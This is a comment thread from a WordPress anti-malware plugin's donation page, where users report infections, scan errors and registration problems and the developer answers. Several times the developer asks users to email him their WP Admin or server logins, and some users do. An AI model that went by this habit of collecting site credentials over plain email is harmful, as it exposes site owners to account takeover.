Donations keep this Plugin alive! If you value this Plugin I urge you to donate as much as can so that I can keep it up-to-date and make it better. The more money I get, the more time I can devote to it, the more you benefit.
Members
285 Comments on "Members"
Leave a Reply
Get instant updates to new definitions files as new threats are discovered.
*All fields are required and I will NOT share your information with anyone.
*All fields are required and I will NOT share your information with anyone.
Made my first donation but I won’t stop here. Your plugin has been such a great help and I am going to continue to donate from time to time and do all I can to support your great work! Thank you so much Eli!
Thanks you
Hi Eli,
Your product is wonderful. It has helped our development work and kept our sites clean.
Thank you! Please accept a small donation US$29
“NO_HTTP_REFERER” …has locked me out (logging into WP) using my usual control panel through my host. I’m sure this can be fixed with FTP. I’m sure this is a side effect of the Brute Force setting.
Just wanted to say, besides this hiccup, your product worked great! What this plugin wasn’t able to fix/delete – I was able to easily find with FTP and plugin as guide.
THANKS!
…now …help?
First, there should always be an HTTP_REFERER when you are submitting a form, that is why it is one of the things that my Brute-Force Protection checks for. If you are going to your wp-login.php page and then submitting the login for and you are getting this message then you must have some kind of privacy/anonymity or security modification to your browser that is concealing the HTTP_REFERER (this would make you look like a hacker). Otherwise, it could be that you are logging into your site from an external page or there could be something very wrong on your server so that it does not see the HTTP_REFERER.
Now, if you are unable the fix the real problem that is cuasing this then you can simply disable the brute-force protection. If you cannot login to get to those firewall settings then you just need to comment-out or delete the first line in your wp-config.php file, right after the opening PHP bracket “
Hi Eli,
I have been using your excellent tool to get rid of some malware on my website, but it keeps coming back. The only error that seems to always come up after scanning and cleaning is a read/write error with
/public_html/wp-includes/js/jquery-migrate.min.js
is this possibly where the bad code is hiding?
It is not likely that any JS file is spreading this kind of threat on your site, and that file is probably only getting the Read Error because it is rather large and the memory_limit in the php.ini file on your server is set too low. If your site is on a shared hosting account itt is more likely that it is getting reinfected by another infected site on that server. You can check the raw acceess_log files on your host (ask your hosting provider if you are not sure where to find these logs) to see what scripts are being call at the exact times that the reinfection occurs (see the Anti-Malware Quarantine for infection times). If there is nothing there then you should probably move your site to a more secure hosting environment.
P.S. I also provide Super Secure Hosting if you are interested
please how can i remove rogueads.unwanted_ads from my website? really need help
Known javascript malware. Details: http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1
Yes, my plugin will get rid of that threat. Make sure you have downloaded the latest definition updates.
Hello, please how many websites can i secure with a single donation of $15. Thanks
One donation of $15 will unlock the Brute-force protection feature on as many sites as you register to the account using the same email address. Furthermore, if you donate $29 or more than it will also unlock the Automatic Update feature which you can use to install the Core Files Definitions on all those same sites
Hello, I restored an older version of the website. Now the gotmls plugin won’t download the updates and the key does not ‘want’ to register. How can I solve this?
The key for the secured URL of your site is already registered to you, so you do not need to register it again. Just make sure you are on the HTTPS site (the one you already registered) and you should be able to download the latest definition updates.
If you still have issues with your registration or the updates then please email me directly with a screenshot of the issue you are having.
its skipping alot of files
It is designed to skip binary file types by default that could not directly execute code on the server and empty files. This saves a lot of time when running your initial scan but you can always change those defaults in the scan setting if you really feel it is necessary.
i tried it with the skipped files, did not deal with the problem.
i removed all those file exceptions and it looked like it would take all day to scan.
i suppose i will try again.
That is why I have set those files to be skipped by default. You can contact me directly with your specific findings and a screenshot of any problems that you find so that I can better help you get the the source of this issue.
is this supposed to remove the malware?
Yes it is, if you have the latest definition updates installed.
i do have the latest.
Hi Eli,
Is there any requirement on the version of revslider to have the vulnerability plugged? My site keeps being hacked thorough there
I don’t remember what version was vulnerable but the newest version should be patched. The firewall in my plugin should also stop the common exploit of revslider if it is active.
Hi, How do I re-register a key. I clicked on “unregister” on this website by mistake and now it says I have to registered keys. I can’t find anything that will allow me to re-register a key again.
Just go back to your wp-admin and use the registration form on the right-hand side of your Anti-Malware Settings page.
Hi Eli,
Do I need to donate for every website I use the plugin on?
Ely
Not if your name is Ely
No, but really, if you register all your sites under the same email address then they will all be on the same account and you only need to donate once
Great, thanks
If I install the plugin on the main domain of my hosting account it will scan everything – including WP installations on add-on domains (installed in folders). Will it also protect them or do I need to install on every site?
It can scan all the sub-directories inside the root of the main site (including any other sites installed there), but it cannot add any protection to each sub-site or detect the proper version of the core files on each site unless it is installed on each of those sites specifically.
Hi,
What mean Read/write errors? the files cannot fix? please advise.
A Read/Write Error means that the file could not be scanned, usually because of the permissions on that file or a restriction of your PHP server. Basically, if a PHP process running on your web-server cannot access the file then my plugin cannot scan it.
Hey Eli, got this error when logging in to a site today. 23991525: NO_SESSION anything to worry about?
If it was a one-time occurrence then I wouldn’t worry about it. Your browsere was probably left on the login page for too long and your session expired. If it happens consistently then you may have a problem on your server that is preventing sessions from being created at all.
Esse plugin realmente é muito bom, recomendo a todos que tiverem problemas com vírus em seu site no wordpress.
How can I enable plugins to my site?
Just click on “Add New” under the Plugins menu item in your WP Admin menu.
Hi Eli,
I can’t register your plugin on my other site. When I click on Free Key I get: No response from server!
All my other previously registered sites work good. Why is that?
I have fixed this error on my server and you should now be able to register.
Wish I could donate to this awesome plugin, and use it in full way.
In IRAN, we don’t have permission to access paypal.com
I am sorry but PayPal is currently my only way to receive donations. I could look into another method if I know it would be easy to integrate and more people could use it. What online payment options do you have in IRAN? What would you recommend I look into?
Greetings. I finally was able to donate under my main Email address. It seems that I have some registrations under an alternate Email address. Is it possible to merge the two? If not, how do I uninstall the plug in completely in order to reregister under my actual email address? I am unable to find the directions here in this forum. I did find the /members area, but that only gave me the option to choose one email or the other. Thanks.
Yes, you can combine your registrations into one account. no, re-insalling the plugin does not change your registrations. You found the /members area, yay. All you need to do is transfer those registration under one email into your account with another email. It does not matter which email you combine them into, as long as all the registrations are under one account.
Okay, thank you. Was worried about losing the paid account, but it appears to have worked perfectly. There are only a few plugins that I use consistently and yours is at the top of that list. So glad we could start sending you support. Thank you.
After the scan is complete and I select Automatically fix, I get Examine Results and the message about clicking here if taking too long. When I click that, I then get a 504 error.
Any advice, please?
A 504 is a Gateway Error, which would seem to indicate a problem on the server or issue with your site that is causing many pages to fail intermittently. I suspect you got this error when attempting to fix because of a simultaneous load issue on your site or some other server interruption.
The malware that I am cleaning doesn’t seem to have any function other than to allow the index page to load, then one other page, then it hangs until a 504 error displays.
Can anyone suggest what the malware might be? I can't find any info about it.
It probably does more than that but I would need to see the whole code to tell you more. You can send the whole infected file directly to my email address.
My site was working, but slow and couldn’t reach all pages, getting many 504 errors. Hostgator advised all PHP pages were infected with malware, although online testing, including Google showed no malware. Why was the malware not found online?
I went into CP and looked at some PHP pages and all had long code at the top of each page. I deleted all the code by hand then a few hours later all PHP pages had the same code again!
Not knowing what to do I found this site and downloaded the plugin, made a donation to get full benefit and the plugin found 400+ pages infected. I then cleaned them and exported the site and will load to a new server as 4 other sites are also infected.
If I download infected files can I install on my Localhost and then use the plugin to clean them or will my Localhost become infected?
Thanks for an excellent plugin!
You can download the infected PHP files safely but you must make sure not to execute them with PHP. If the code in those files gets executed then it could infect your local machine. I would suggest cleaning all the sites in-place, on the server. You can install and use my plugin on multiple site, just use the same email address to register them all so that they are on the same account.
Many thanks for your reply.
Yes, I discovered that I can use the plugin on multiple sites with my code. As I clean each site I compress the clean files to a .zip and download them to my computer. After cleaning one site it is not being reinfected, which is good news.
A great plugin and I will make another donation when I have done the 6 sites on the server.
cpanel has an antivirus included and it found some viruses that anti malware didn’t found:
public_html/foldername/errors.php: quarantining……done
public_html/foldername/images/patterns/views.php: quarantining……done
public_html/foldername/images/patterns/kam.php: quarantining……done
public_html/foldername/js/mail.php: quarantining……done
name of viruses are respectively:
Win.Trojan.Hide-1
Win.Trojan.ld-34
Win.Trojan.Mailer-10
Win.Trojan.Mailer-10
Can you email those files to me? I need to see the malicious code in those files so that I can add them to my definition updates.
May I ask, what cpanel antivirus you used? Site Doctor? …Thanks.
The partial snippet of code that you sent me does not help if I cannot see how it ends, but based on how it starts off I am pretty sure that this threat is already in my definition updates. Please send me the whole file as an attachment so that I can be sure or get it added to my definition updates if it is something new.
Hello, thank you for plugin (i’ve donate). I dont understand why Sucuri still say i’ve MW:JS:GEN2?web.js.script-injection.003…
You site is actually clean now but Sucuri caches their scan results, so you just need to click the link at the bottom of the page that says “Force a Re-scan” to clear the cache.
Note at the bottom of the Sucuri scan results:
*Cached results from more than 2 days ago.
Thanks for your plugin. I’ve just donated another $29.22 to add the plugin to another two sites. I will continue to donate for each site I add the plugin to. Thanks for your efforts.
Just started using your plugin and it already found some issues.
Donation coming your way. Thanks!
Donated
Thanks for this awesome plugin.
Hi Eli,
I have donated via PayPal. Sent you email.
Thanks so much for this plugin.
This plugin has been helpful for me in the past. I just donated. Hoping it’s helpful for me again. Thank you for what you are providing!
Perfect! Gracias!
Hello!
Excuse my English I speak Spanish!
Really very good, I congratulate you.
How many sites can activate with a donation of 29 dollars?
Best regards
As many sites as you want, as long as you register them all under the same email address
Happy to donate. Keep up the great work!
Donated
Thanks
Donated via paypal email because paypal wouldn’t let it got through the normal way,
Thanks for developing this pluggin
Got it. Thanks for your donation
I may be premature in asking this because the scan is still going, but Google has provided a list of the infected pages on our website. Your amazing, brilliant scanner has picked up numerous problems and fixed them but none of them are on the pages that Google says are the problem pages.
I’m scared that we are going to miss the pages that Google says are the problem pages.
Google will only tell you about Pages (URLs) that are showing malicious content. My plugin will find the files (PHP code) that is responsible for that content being displayed. Once the files are clean then you can request a review in your Google Webmaster Tools account and Google will rescan those URLs to make sure they are clean and then remove your site from their blacklist.
OMG. Your scanner worked. We are back on Google. I paid someone $50 to help me clean our sites and he didn’t get any result. And I paid someone else and he didn’t get a result. But your scan did it. It found the infected files and cleaned them with one click. It took 4 hours to scan only about 100 pages but it was worth it. You are a champion.
Hi
I just get registered and made donation but, i still see no key in the plugin setting page and “Download new definitions” has no effect (“Download the new definitions (Right sidebar) to activate this feature” still in red)
Any help ?
I see your donation for $14.89, Thanks for that
If the Manual Updates are not working then you should check your firewall settings.
If you are referring to the Automatic-Update feature then you need to have donated above the default level (at least $29+).
How do I get all my sites working.
Thanks
42
…if you need more help please describe your situation in more detail.
This answer is great!
Can I install de same plugin in other web site?
Yes, you can use this plugin on as many site as you want.
Just get a new key for each site and register them all using the same email and they will all be under the same account.
how I can register a new site ?
The same way your registered your first site. Install and Activate the plugin, then go to the Anti-Malware Settings page in your wp-admin, click on “Get FREE Key”, and submit the registration form. Just remember to use the same email address that you used to register your first site if you wan them to be in the same account.
Just wanted to say that your plugin saved me from the hearth attack. Thank you so much, just donated $29.
Greetings!
have you developed anti malware for Joomla!
Pandu
No, sorry, This plugin is currently only available for WordPress. You can however put any files that you want to scan into a directory on your WordPress site and the plugin can then scan them for you
Thank you.
Wow, I was overwhelmed and I happened on your plugin. I had found some but I don’t know php and some of the php code seemed odd to me. Sure enough, you flagged it!! Stats from my site:
5202 Scanned Files
1074 Scanned Folders
Found 4 Backdoor Scripts
Found 22 Known Threats
Now just to get my site off the blacklist. Ugh.
Thanks for you generous donation
Hi great plugin just donated a small amount of $10, how do I make all features available for my site? Thank you…
Thanks for your donation
Donating a total of $14+ will unlock the Brute-Force Protection in the Firewall Settings.
A total contribution of $29+ would unlock all features, including the Automatic Updates which makes the Core Files Definitions available too.
Hello,
I can’t download the updates after generating a key when i click on download it will redirect me on scan page which does not show the key and ask me to generate a key again.
Please help me what should I do ?
also please tell me is there any other source to donate this plugin ? because we dont have PayPal service here in our country.
Thanks
The two most likely reasons for the definition updates not being installed are either: you have a post size limit specified in your php.ini file that is too small for the initial updates; or you might have another firewall plugin installed that is blocking the updates.
I’m sure that the Automatic Update method would work for you but I am sorry that I don’t have any other means of accepting donation besides PayPal.
If you would like me to troubleshoot the definition updates on your site you could send me your wp-admin login, directly to my email address, eli AT gotmls DOT net
Hey, good morning,
Awesome plugin
One question can I get a receipt for the donation ?
Thaks for your time
Thanks for your donation, I don’t send invoices or receipts but I think you can print the transaction details from PayPal as a receipt
A scan I just did of my site showed that it was clear of malware, however, when I visit it… my antivirus warns me that the site is infected. I confirmed this on another computer. Why is this? I thought your program would catch it.
I don’t know what type of warning you got from your Anti-Virus software but your site looks clean now. The warning you got was probably related to a blacklist which can sometimes take a little longer to clear up even after you have cleaned your site.
I added some html pages to the white list but they keep coming up in the threat. I would like to know if there is something that is a threat or if it is a false positive.
Also, my definitions are set to auto update but they don’t. I had to update them.
Have the definitions set to auto update is the reason that your custom white-list get’s overwritten. The auto update feature installs the most current definition every time a scan is initiated, so you won’t see them getting installed until you start a scan because they are not needed until then.
As for those HTML file that you are trying to white-list, can you send them to me so that I can see if they are false positives?
I have optimizedpress on my hosting account with WP. A bunch of pages for OP show they are a known threat because there is js after the body. It seems that this script should be there changing some fonts on the page. I was wondering if you can verify its a false positive.
That theme does but the script tags after the closing of the body tag
which should be reserved for hackers and bad programmers 
Just edit those files that are same and move the scripts inside the body tag, where they should be, and then it will not look like hackers injected that code
Thanks. Not sure what genius came up with that idea…. lets put code outside the body.
Eli: I donated and registered a site but then put the second site under a different email before realizing it. Can you help me move the site under my donated account?
Thanks
ss
You can just login to gotmls.net with the password that was sent to that second email address and then transfer that registration to your first email
Hi, I meant to donate the $29 to to BETA test the new Scan Core File feature and get Automatic Definition Updates.
I donated $14 by mistake
Can I pay donate the difference? I want to try it out and if ths works I will donate for each installation I make on each wordpress site I have.
Thank you so much
Azu
Yes, you can just make another $14+ donation and it will unlock that feature for you
Hello! Plugin is fantastic and I’ve donated for sure. Issue is the “Automatically Fix Selected Files Now” isn’t working for me. Then I tried to press the designated button for it it was taking too long and I keep getting this error:
Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
Can I get some help on this please? If I can get these errors fixed, it would be amazing. Thanks!
It sounds to me like your Mod_Security settings are blocking my plugin from fixing those files. You need to talk to your hosting provider about changing the settings for Mod_Security to allow these requests or else whitelist your IP address to that you can at least fix those files.
I am using your plugin from the beginning of my blog. Recently Google has warned me about malicious content on my website. But after scanning the site it’s not showing or detecting anything new. But Google has not removed the warning. Can you please suggest me what to do?
Sometimes Google take a long time to update their cached results for a site and this delays the removal of that warning you are getting. Re-check the date on the last threat that is shown in the Security section of your Google Webmaster Tools. If it is today’s date then you may have a new threat on your site, have you downloaded the latest definition updates for my plugin?
Greetings.
I’m having an odd problem at one of the sites where I’ve installed your fabulous plugin.
I log in to the site click the “Anti-Malware” button.
It says on that page “Get FREE Key!”
I click on that and it immediately displays the key and also displays “Download new definitions!”
i.e. It doesn’t present me with the usual form to fill in with name and email address.
So I click the “Download new definitions!” button and nothing happens.
Something seems to be TRYING to happen, but it never does. Eventually, the page times out.
Unlike the other sites that I’ve registered with a KEY, this site always asks me to get a Key.
Your advice on this would be appreciated. Thanks.
Best Wishes,
PRODOS
Melbourne, Australia
It sounds like that site was already registered. The same Key will be regenerated for that site every time you Get the Key, but it cannot be saved unless the definitions are downloaded. The problem is that you don’t seem to be able to download the definitions on that site. I’m not sure why it’s not downloading on that site, and this suggestion is kind of a lame workaround, but have you tried the Automatic Updates? When the manual download and save fails for whatever reason the Automatic method always works. Just click “Get FREE Key” as usual but then check the “Automatically Update Definitions” box at the bottom of the Scan Setting page and then click Save.
Thanks Eli,
That worked!
Best Wishes,
PRODOS
Hey, i have donated but i can’t scan the Core File Changes – but why?
Thanks for your donation. You just need to check the box for Automatic Updates at the bottom of the AntiMalware -> Scan Setting page in your wp-admin and then click Save. Then you will have the definitions for the Core Files.
thank you so much!! you are a virtual hero
i need help. My host (hostgator) have restricted all my sites, and now i cannot even access to my WP admin, so i cannot make your plugin run …. (is there a way you can help me via ftp access only ?) – thanks
It’s hard to work on this kind of thing when you cannot access your sites. How many sites do you have on that account?
Maybe they can restore access to one site for you so that you can use my plugin to clean them all up.
well.. i’ve managed to migrate the sites one by one to other servers, so i can have access again to WP panel, and use your plugin to clean them up..
Thanks for your help, and by the way, i just paid the 29$ via paypal today for your plugin which sound to work really good !.. Thanks a lot again for your work !..
PS : Hostgator is just a big Axx Hxxx and don’t help you at all when you are in trouble with malwares or attacks. They just close your site and that’s it. And then they try to sell you their security services, … for very expensive ..! Good business for them !.. So I decided to move all my sites to other servers … Bye bye, i am not going into this fake business ..
Thanks for this tool, it has identified several issues. However, when I run the quick scan on themes it skips all of the subfolders. I don’t see any settings where I can update the quick scan. Is there a way to update this?
The Quick Scan was designed to be a fast and short scan of the most likely locations for Known Threats. It runs under a single PHP process so that it finishes quickly but that means it has memory and timeout issues so I defaulted the scan_depth to 2 so that it would not drill down too deep and get stuck half way through a scan. You can manually override the scan_depth by adding the URL parameter at the end of the Quick Scan path (try adding &scan_depth=3 to the end of the URL, if that work then maybe try 4 or 5).
my url got malware/virus , if open desktop web i didnt see any different but when i open my url via mobile phone, the url keep direct me to adsvertisement web, i already use your plugin to scan but didnt detect any malware/virus ? any step i miss ?
rescan , it is work ! thanks. solved
Hi,
After most recent update I no longer can download new definition updates. It says, “Your Installation Key is not yet Registered!”. But as I found out in my profile in Gotmls it is registered and active.
Can you please look into this issue?
Thanks and have a great day!
Thanks for the login. This is a multisite and I don’t have network admin access so I cannot fix it for you but I did figure out what the problem is and I just released another update that should fix this for you.
Please download version 4.15.19 and let me know if that does he trick.
I am having the same problem. It says my key is registered on here, but the plug keeps the message not registered. I am not using multi site and i am already updated to 4.15.19
Sorry for the confusion, 4.15.19 didn’t fix it so I release 4.15.20 which has been confirmed to fix this issue. Please recheck for plugin updates and download 4.15.20 to resolve this issue.
Eli,
What about multiple sites. not to complain because Im happy as a pea. but I have several personal websites. Can I use the same key? or do I must I donate for each of them? just asking. BTW great plugin. World needs more people like you!
TIA.
Sam
Thank you!
Each site generates it’s own key, but you can register each site key under the same email address so that they are all on the same account. Then you can make one lump-sum donation for all sites on that account.
I don’t see where I can add this to my other 2 sites. I have a few plugins that I did pay for and there is always a license key on top that I just paste my code to, and it activates it on the site. I don’t see anything like this for the other two sites I have no idea how to do it. Can you instruct me please?
Thanks,
Lynn
Each site must be registered with it’s own unique Installation Key, but if you use the same email when registering multiple sites then they will all be registered under the same account.
Thank you for a great plugin. The depth of your technical expertise puts me and my clients at ease. Great work. Please keep it up.
Excellent software..I really thank ELi and the people who made this great work..
a great sigh of relief!
Hi Eli,
My 2 cents collaboration, Spanish howto:
http://www.webempresa.com/blog/item/1641-detectando-y-limpiando-malware-en-wordpress.html
Thx & regards
That’s great! Thank you very much for writing that howto in Spanish
Eli, thanks for a great service. Another donation on the way
The fix isn´t working.
The scan finds 306 knwon threats, but when I press “Automatically fix selected files now” it thinks for 3 seconds and says “Nothing selected to be changed” and “Done!” and nothing happens
Are you certain these are “Known Threat”, in red, and these are check-boxes at the beginning of each line that are all checked?
If you are still having this issue can you send me a screen-shot?
Thank you for sending me a login to your site. Something on your site is blocking my plugin from submitting the “Fix” form. I upgraded my plugin on your site to the BETA version that I am about to release. The new version of my plugin includes a workaround for this scenario and you should be able to fix the malware it finds now.
Please run another Complete Scan and let me know how it goes.
Hi Eli,
I’m a little confused about the Scan level setting.
If it is set to -1 does that scan all of the folders on a particular domain folder or does it scan all the folders of all the domains in my account on a shared server?
If not, how is it possible to do a complete server scan of all sites at one time?
Does the plugin need to be installed on each individual domain and run separately?
Also are folders outside of public_html scannable or vulnerable to attack?
Seems like a great plugin, would like to make the most of it,
Thanks
The Scan Depth is how far down to drill into directories looking for threats, not how far up to start looking.
I have set The Scan Level for your domain to start scanning one level higher, this should get you into the public_html directory where you can scan all your sites at once, but you need to Download the latest Definition Update for this change to take effect.
It is possible for hackers to take control of a server at the root level (outside you home directory) but there is not much you can do about that unless it’s your server.
Let me know if I can be of any further assistance.
Help, I have used the program, registered the key and made a donation. The scan will only complete to 66% and it seems to have really, really slowed down my site. I do not know where to begin to correct this.
I really appreciate your plug in and need support. Thanks Maymay
Have you tried the Complete Scan? it does not task your sites resources as much as the Quick Scan.
When it stops at 66% is there an error message?
If you want to give the your WP Admin login I can try it myself and see what’s going on.
how do I contact you directly with that info?
Just reply to this email notification, it’s from my address, nobody else reads it but me. Or send a new email to: eli AT gotmls DOT net
Is there a way to schedule scans? Maybe an upgrade or cron job I could run? I’ve got too many sites to have time to go in and run this constantly.
There is no way to schedule a Complete Scan at this time but that is a feature that I am working on. However it would be a pretty poor band-aid to just keep scanning and cleaning your sites over and over when what you really need is to get them all completely clean and patch the hole that is letting these hackers reinfect you.
Two things that might help you right now are: (1) I could get my plugin to scan all of your sites at once from just one admin page if all your sites are on the same server, (2) If you find out how the hacker is planting scripts on your server then you can stop him (or her) from continually re-infecting you.
Hey Eli;
Just loaded up your plugin and ran a scan – I’ve got 21 potential threats – mostly well-known plugins and wp-includes js files.
Shall I send them to you via the plugin to check?
Thanks!
Austin.
There are a lot of .js files that come up as Potential Threat just because the use the eval() function. These are usually ok but I leave that general rule in there in case you have a threat on your site that you cannot find in the Known Threats. If you are sure that these are all ok then you can whitelist them in my plugin and send me your reason in the form provided then I will get to adding them to my global whitelist when I have time. Honestly, I am very busy right now and whitelisting potential threats in .js files is about the lowest thing on my list of priority list. This being a free plugin, financed only by your donations, I do what I can to make it the best it can be, focusing on new threats first and then important features and enhancements.
I have barely used this plugin for 8minutes and I’m like wtf is this. This is the best plugin I have ever come across on wordpress and you really deserve lots of kudos for this. Do you do freelance work?
Thanks for the kudos. I do freelance but I’m very busy at the moment. Feel free to email me directly if you need anything and I see what I can do.
Hi Eli. I have just stumbled on your plugin. Google blacklisted my blog couple of days ago and the problem listed was a code injection that was linked to a website called earnmoneydo or something like that
”
I have tried to look for this code but couldn’t find it. I have run your plugin and I have deleted 4 known threat. Does that mean its a safe now even though the code wasnt included in the one your plugin found?
Kind regards for your help.
If you removed the Known Threats that my plugin found then it probably fix. Now you need the Google to refresh the cache they have of your site so that they drop that warning. The best way to do that is to request a review in the Malware section of your Google Webmaster Tools account.
I noticed last week that when I looked up my website on google I get a warning message that says “this site might be hacked.” I ran a site scan and got this:
Known Spam detected.
Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
I ran your antimalware plug-in on my site and it didn’t come back with anything.
MW:SPAM:SEO is a generic label for a broad range of malicious ads. Although my plugin can find and automatically fix many of then there are always new variants that come out that need to be added to my definition update. If you can provide me with WP Admin access to your site then I will find this new threat and add it to my definitions so that it can be automatically removed like the rest.
Thank you so very much. Is there an email where I can send the log in info to?
I got the login you sent me, thanks.
The problem was just that you had not downloaded my latest definitions update. Once I did that and ran a Complete Scan it started finding a Back-door redirect script embedded in hundreds of WordPress core files. The Complete Scan took about 25 minutes to scan over 20,000 files on your site and found a total of 820 malicious scripts. I had it automatically remove these injection from the infected files and your site does not appear to be infected any more.
It looks like it may have been a vulnerability in your “irresistible” theme that let this hacker into your site. You should delete that theme if you are not using it.
Hello. My site has Virus http://babygamesonly.com/
How i can remove it ?
I take it you have scanned it with my Anti-Malware plugin and found no Known Threats? If my plugin does not find anything you can send me your WP Admin login and I’ll look for it myself.
I installed your great plugin previously and it was working great. I updated WordPress and now your plug in is not showing up on my dashboard. Also, I tried installing and it says that it the plugin already exists but I am not finding it. Can you please assist?
Does it show on the list of installed plugins? Is it the newest version? When you tried installing it and got the “already exists” error, what was the exact message you got?
If you want me to look at it for you please send me your WP Admin login.
I just installed your plug in but it didn’t find any known threats but I do have a real compromised problem here. When I type in my website http://www.octaviaharris.com on sites like facebook or https://bitly.com/ the description and page text display weird text like this:
Isr med assoc j androl mccullough levine return of Levitra Viagra Vs Levitra Viagra Vs symptomatology from a nexus between the serum. Criteria service connection on erectile dysfunctionmen who have Price Of Cialis Price Of Cialis revolutionized the users of ejaculation? They remain the chronicity of diverse medical Cialis Cialis and minor pill communications.
It just started happening yesterday. Can your plug in help resolve my issue?
Thanks
It should be able to find this threat. If you have downloaded the latest definition update and it still does not find any known threats on a Complete Scan then you can send me your WP Admin login and I will find it for you and add it to my definition update so that it can be automatically detected and removed.
Hello,
My WP site was compromised. I went ahead removed php files via FTP that the plugin found. Would you please check things out to be make sure sure that all is well now.
Thanking you in advance!
It looks alright from the outside. What was the file that you deleted?
If you have any reason to think you might still be infected and you want me to check it out from the inside I’ll need your WP Admin login.
Hello,
I am having recurring issues with backdoor scripts? Can you please help me resolve this issue?
Send me your WP Admin login and I’ll take a look. You can email the info directly to me: eli AT gotmls DOT net
Thanks for this AMAZING plugin
I have tried everything to reface my website
crescentcarco.com
replaced every file, except the uploads folder *checked it manually*
now my subpages work fine but my main page still redirects.
can you PLEASE take a look at it, I will be obliged
Thanks for sending me access credentials to your site and your server.
Got the home page fixed!
It turns out there was a text widget that was injected into your database. I’m not sure how the hacker did that, probably a database vulnerability at the hosting level, but it was easy to remove.
Please let me know if there is anything else I can do for you.
Dude you seriously ROCK
i also saw the entry of the text widget in the database, it looked suspicious and made no sense at all, but i was afraid to mess up the DB.
Once again thanks man, I really appreciate your help
Any advise on securing my site permanently, it gets defaced often.
Thanks
Numair
Thanks.
Protecting your site from future hacks is difficult because there are just so many ways that hacker will try to get in. In your case, because of the way the DB was hacked I would suggest moving to a more secure hosting environment. Cheap shared hosting is just so vulnerable to cross-site contamination, control panel breaches, and root server hacks.
I now offer very secure hosting for those that are getting too much attention from hackers and need a safer place to host their site. It’s $12/month per site and there is no control panel. Let me know if you are interested.
Eli,
Thank you for the wonderful work you’re doing and for this great plugin.
Three of my WP sites were hacked last week and the hacker’s page and music (from Philipines) were inserted on my homepage. After a couple of days, Hostgator fixed it for me and warn me to always updates my plugins and themes.
Today, the same hacker did his thing again, only it has affected more of my sites.
Thus, I downloaded your plugin and after scanning one site, it identified 4 potential viruses. Below is one of them.
Do you think this is the virus. I can give you admin access if that will help.
Thanks!
cap->create_posts ) )
wp_die( __( ‘Cheatin’ uh?’ ) );
/**
* Press It form handler.
Thanks for sending me your WP Admin login credential. I downloaded my definition updates and ran a Complete Scan on your site. Those potential threats are all ok. It looks like your site was defaced by a hacker using a vulnerability of your server or another compromised site on your shared host. There may be nothing you can do to stop an attack like this other than moving all your sites of that server.
The good news is that the damage is minimal and very easy to fix. The hacker has planted a file called index.html in the root directory of each infected site. WordPress uses a file called index.php so index.html is not needed and should be deleted. You can use your host’s file manager or any FTP client to delete these infected index.html files easily. I have also updated the scan range of my plugin on your server to scan the whole public_html directory and all the sites in it. If all else fails you can use me plugin to find and delete these infected files, it will take a really long time to run a Complete Scan on all those site but the option is now there if you need it.
Let me know if you need any more help.
Aloha, Eli
Thanks, Eli.
I’ll do as you advised.
I’ve got some malicious virus on the website and ran your plugin which found 18 potential threats. A lot of index.php in different folders that just have one single script in each file (?). But i really dont know how to do now. How do I get rid of this malicious virus? Can you please go into the website and fix this? Would of course make a donation if the virus gets away.
Thanks,
Limp
Can you please email me with the WP Admin login for your site?
My direct email is: eli at gotmls dot net
hi i have the same issue please help
Have you registered my plugin and downloaded the latest definition updates?
If you have done this and my plugin still does not find any known threats then this could be a new type of infection that needs to be added to my definition update. As I told Limp Salas, if you send me your WP Admin login I will find it for you and add it to my definitions so that it can be automatically removed.
Hi
First of i must say awesome plugin but thing is that i am facing daily wordpress post attack like
and something suspecious
these kind of attack .
Do you have any plugin that solves these kind of issue on posts ??
Thanks
It sounds like this could be an SQL injection. You should try changing the login credentials to your DB. If the attacks continue at regular intervals check the log files at the time of the attack to see if you can spot the script file responsible for the injection.
Something has infected all of my plugins on different sites. I am trying to run your plugin (which I resintalled) and I am getting the message
“Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process).”
I don’t have any plugins running (as a result of the virus), so I can’t figure out how to fix the issue with the output buffers. Any ideas? Right now it has checked 25 folders in 18 minutes with 4,407 folders left to go.
eva1fY2bak1cV2ir sound like a malicious function that was hacked into your site to inject redirects or ads into the output of your pages. It is probably embedded in your theme or one one of the core WordPress files. It may also be encoded so that you cannot easily search for it or tell what it’s doing with your output.
It’s obviously affecting the speed of you site if it’s taking that long to scan. If my plugin does not find it when the scan finally finishes then you can send me your WP Admin login and I’ll look for it for you.
You misspelled “handle”:
Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
Thanks for pointing that out. That message has been misspelled this whole time and I didn’t notice and nobody else has said anything until now. I’ll have it corrected in my next release.
Hey Eli,
I noticed that all my sites I have your plugin installed on got a message alert that the wp-content/plugins/gotmls/safe-load.php file was changed. Did you do this or are the hackers trying to defeat your plugin?
Thanks…
That was me. I did upload a change to that file but did not release a new version so it shows up different.
Hello Eli
I am learning how to be a web master and have had to deal with these malware problems more and more lately. I love your anti malware program. Can I get you to look at our site and help me make sure there are no problems. This is a school website and I need to make sure the community can access this website safely.
my site http://www.cic-caracas.org is infected by malware. i have scanned using this plugin and confirmed and said it took care of some of the treats but listed 68 potential threats. What can I do about all of those. Please tell me how to remove all those or if it is necessary.
Thanks.
I would be happy to check your site for you. Can you send me you WP Admin login?
You can email the password info directly to: eli at gotmls dot net
Thanks for sending me the login. I did find one more threat in the footer, added it to the definition update, and removed the malicious code from that file.
Your site should be all clean now. You just need to go to your Google Webmaster Tools account and request a review in the Malware section to get rid of that warning from Google.
Please let me know if you need anything else.
Hi Eli,
Thank you for this great plugin! It fixed a lot of crap having entered my site, but yeasterday I got a new one. All plugins disapeared, but still in the plugin directory. I removed everything to try to re-install, had a hunch so started with Anti-Malware to run a scan and it reported:
“Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process).
What is this “eva1fY2bak1cV2ir” – and how to get rid of it??
Br,
Stein
eva1fY2bak1cV2ir is a custom function that has taken over the output buffer on your site. I cannot say exactly what it does without seeing it, but I would guess it is filtering the content of you site to display only what the hacker wants to display (or it inserts content that the hacker wants to add to your site).
If you want to give me access to your site I will see if I can find it for you.
Thanks a thousand Eli – new donation is done.
